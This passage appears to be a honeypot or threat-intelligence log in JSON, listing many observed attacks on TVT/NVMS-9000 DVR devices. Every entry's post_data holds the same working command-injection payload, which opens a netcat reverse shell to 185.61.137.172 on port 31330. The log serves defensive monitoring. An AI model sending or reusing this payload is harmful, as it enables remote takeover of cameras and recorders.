- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T19:35:02Z",
- "last_seen": "2019-12-22T19:35:02Z"
- },
- {
- "source_ip_address": "87.97.29.163",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-22T19:16:11Z",
- "last_seen": "2019-12-22T19:16:11Z"
- },
- {
- "source_ip_address": "68.129.235.16",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T19:11:27Z",
- "last_seen": "2019-12-22T19:11:27Z"
- },
- {
- "source_ip_address": "190.34.236.78",
- "country": "PA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T18:58:22Z",
- "last_seen": "2019-12-22T18:58:22Z"
- },
- {
- "source_ip_address": "82.50.184.9",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T18:43:32Z",
- "last_seen": "2019-12-22T18:43:32Z"
- },
- {
- "source_ip_address": "47.199.54.172",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T18:42:42Z",
- "last_seen": "2019-12-22T18:42:42Z"
- },
- {
- "source_ip_address": "59.125.188.199",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T18:38:15Z",
- "last_seen": "2019-12-22T18:38:15Z"
- },
- {
- "source_ip_address": "154.66.154.96",
- "country": "ZA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T18:14:28Z",
- "last_seen": "2019-12-22T18:14:28Z"
- },
- {
- "source_ip_address": "61.70.132.168",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T18:10:48Z",
- "last_seen": "2019-12-22T18:10:48Z"
- },
- {
- "source_ip_address": "104.172.41.232",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T18:10:44Z",
- "last_seen": "2019-12-22T18:10:44Z"
- },
- {
- "source_ip_address": "37.230.157.186",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 44,
- "first_seen": "2019-12-18T19:39:05Z",
- "last_seen": "2019-12-22T17:58:38Z"
- },
- {
- "source_ip_address": "173.12.220.213",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T17:50:25Z",
- "last_seen": "2019-12-22T17:50:25Z"
- },
- {
- "source_ip_address": "122.116.28.86",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T17:18:17Z",
- "last_seen": "2019-12-22T17:18:17Z"
- },
- {
- "source_ip_address": "178.164.180.174",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-22T17:12:16Z",
- "last_seen": "2019-12-22T17:12:16Z"
- },
- {
- "source_ip_address": "73.175.251.32",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T17:09:44Z",
- "last_seen": "2019-12-22T17:09:44Z"
- },
- {
- "source_ip_address": "50.233.0.106",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-22T16:58:03Z",
- "last_seen": "2019-12-22T16:58:03Z"
- },
- {
- "source_ip_address": "73.205.75.142",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T16:52:45Z",
- "last_seen": "2019-12-22T16:52:45Z"
- },
- {
- "source_ip_address": "187.145.214.142",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T16:40:22Z",
- "last_seen": "2019-12-22T16:40:22Z"
- },
- {
- "source_ip_address": "122.116.161.146",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 10,
- "first_seen": "2019-12-20T06:25:22Z",
- "last_seen": "2019-12-22T15:56:00Z"
- },
- {
- "source_ip_address": "114.32.8.15",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T15:45:56Z",
- "last_seen": "2019-12-22T15:45:56Z"
- },
- {
- "source_ip_address": "1.34.82.230",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 50,
- "first_seen": "2019-12-22T15:45:07Z",
- "last_seen": "2019-12-22T15:45:07Z"
- },
- {
- "source_ip_address": "118.101.108.37",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 7,
- "first_seen": "2019-12-22T15:29:27Z",
- "last_seen": "2019-12-22T15:29:27Z"
- },
- {
- "source_ip_address": "51.37.250.63",
- "country": "IE",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T14:57:09Z",
- "last_seen": "2019-12-22T14:57:09Z"
- },
- {
- "source_ip_address": "62.28.99.1",
- "country": "PT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-22T14:55:43Z",
- "last_seen": "2019-12-22T14:55:43Z"
- },
- {
- "source_ip_address": "190.47.187.23",
- "country": "CL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 7,
- "first_seen": "2019-12-22T14:45:34Z",
- "last_seen": "2019-12-22T14:45:34Z"
- },
- {
- "source_ip_address": "49.213.189.67",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 57,
- "first_seen": "2019-12-22T14:38:37Z",
- "last_seen": "2019-12-22T14:38:37Z"
- },
- {
- "source_ip_address": "122.100.65.80",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-22T14:29:05Z",
- "last_seen": "2019-12-22T14:29:05Z"
- },
- {
- "source_ip_address": "220.134.143.246",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
